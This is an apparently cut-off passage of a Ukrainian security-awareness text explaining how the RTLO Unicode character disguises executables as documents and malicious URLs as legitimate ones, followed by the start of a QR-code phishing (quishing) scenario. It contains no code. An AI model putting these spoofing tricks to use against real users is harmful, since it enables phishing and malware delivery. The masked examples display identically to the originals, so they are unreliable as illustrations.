У результаті він виглядатиме як document.pdf, але насправді буде document.exe або іншим виконуваним файлом.
Це може ввести користувача в оману й змусити завантажити або відкрити файл, який насправді є шкідливим.
У результаті користувач бачить document.pdf,
але насправді файл є .exe (тобто виконуваним і потенційно шкідливим).

2.Обманливі URL-адреси

Приклад:
Зловмисник може використати RTLO, щоб зробити шкідливу URL-адресу візуально схожою на легітимну.
Наприклад, example.com, але з RTLO це може виглядати example.com, але якщо ви курсором на клавіатурі проклацуєте зліва направо, то курсор буде вести себе навіпаки.

Ці атаки ефективні, оскільки користувачі довіряють розширенням або візуально знайомим посиланням, не підозрюючи про приховану структуру.

Приклади використання RTLO

1.Маскування імен файлів:

Оригінал: report.docx
Замаскований варіант: report.docx
(де .docx відображається у зворотному порядку завдяки символу RTLO, створюючи ілюзію розширення документа)

2.Приклад фішингового URL:

Оригінал: https://secure-bank.com
Замаскований варіант: https://secure-bank.com
(де фактичне доменне ім’я може бути зовсім іншим через використання RTLO)

Quishing (фішинг через QR-коди)

QR-коди можуть використовуватись у фішингових атаках для того, щоб змусити користувачів відвідати шкідливі сайти або ввести конфіденційні дані.

Вбудовуючи фішингове посилання в QR-код, зловмисники використовують зручність і поширеність сканування кодів для обману жертв.

Сценарій атаки: фішинг через QR-коди

Мета: обманом змусити користувача перейти на фішинговий сайт або завантажити шкідливе ПЗ, використовуючи QR-код, що виглядає як посилання на легітимний сервіс.